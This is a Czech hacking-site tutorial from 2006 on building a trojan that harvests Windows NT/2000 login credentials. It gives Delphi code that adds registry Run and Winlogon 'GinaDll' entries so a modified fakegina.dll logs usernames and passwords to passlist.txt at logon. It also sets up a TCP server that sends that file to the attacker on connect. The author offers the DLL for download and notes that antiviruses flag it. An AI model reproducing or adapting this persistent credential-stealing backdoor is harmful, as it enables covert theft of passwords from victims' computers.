Ziskavani hesel ze systemu WinNT

Zdroj: SOOM.cz [ISSN 1804-7270]
Autor: Edie
Datum: 15.8.2006
Hodnocení/Hlasovalo: 1/1

Tento clanek bude o kombinaci programovani trojskeho kone a programu fakegina.dll

Uvod


Cilem tohoto clanku bude vytvorit program ktery po zkopirovani do slozky pro spustilne soubory spolecne s programem fakegina bude umoznovat utocnikovi pristoupit na jakykoliv zvoleny port a nechat si vypsat vsechny dosavadni pristupy na pocitac obeti, tzn uzivatelska jmena a HESLA.
Muze se zdat ze naprogramovat neco takoveho je skutecne obtizne ale bosah tohoto clanku bude stejne obtizny jako obsah clanku predchoziho. Jelikoz temer celou praci za vas udela program fakegina.
Par slov k tomu co je to fakegina. Prihlasovaci obrazovku widows2000 urcite vsichni znate. Program ktery je za to zodpovedny se nazyva msgina.dll a je umisten v C:\windows\system32 a pak ma jeste zalohu v adresari C:\windows\system32\dllcache. Je zrejme ze tedy hodne hackeru napadne myslenka, co tedy tento program otevrit v Assembleru a pozmenit ho tak aby po overeni uzivatelskeho jmena a hesla ulozil take tyto dve promenne do souboru s nazvem passlist.txt ktery se nachazi v C:\windows\system32\.
Ve WinXP se fakgina da pouzit take ale zmeni se tim prihlasovaci prostredi. Fakeginu zavedeme tak ze ji pridame do registru pro spustiltene soubory pri prihlasovi obrazovce "winlogon" s nazvem GinaDll.

Vytvoreni samotneho programu


Pri spusteni naseho programu na PC obeti se musi pridat nas program do registru po spusteni a program fakegina.dll do Winlogon. To provedou nasledujici radky:



var
   klic: string;
   registr : Treginifile; // novy registr
begin
   klic := '\Software\Microsoft\Windows\CurrentVersion\Run'; // nastavi cestu registru do Po Spusteni
   registr := Treginifile.Create; // vytvarime registr
   registr.rootkey := HKEY_LOCAL_MACHINE; // nastaveni cesty pro vsechny uzivatele pocitace
   registr.createkey(klic); //vytvoreni klice s cestou do Po spusteni
   if registr.openkey(klic, False) then registr.writestring(klic, 'update', 'file.exe');
   registr.free;
   klic := '\Software\Microsoft\Windows NT\CurrentVersion\Winlogon';
   registr := Treginifile.Create;
   registr.rootkey := HKEY_LOCAL_MACHINE;
   registr.createkey(klic);
   if registr.openkey(klic, False) then registr.writestring(klic, 'GinaDll', 'fakegina.dll');
   registr.free;
end;

Tyto radky umistime do Form Events do udalosti OnCreate. A podobne jako v minulem clanku vytvorime idTCPServer viz User Texts: Trojske Kone.
Nas trojsky kun bude jednoucelny: okamzite po pripojeni k pocitaci obeti vypis uzivatelska jmena a hesla ze souboru. Do udalosti OnConnect komponenty idTCP Server napiseme nasledujici radek:

   Athread.Connection.WriteFile('C:\windows\system32\passlist.txt');


ktery nam posle nase chtena uzivatelska jmena a hesla. Nyni zbyva uz pouze automaticke odpojeni od naseho serveru:

   Athread.Connection.disconnect;


Tento radek pridame ze predchozi a docilime tim ze cela akce probehne velmi rychle... THE END

Jeste na zaver chci dat ke stazeni program fakegina jelikoz nevim zdali je v downloadech.
fakegina.dll
Jo a bacha vetsina antiviru je ma v databazi :)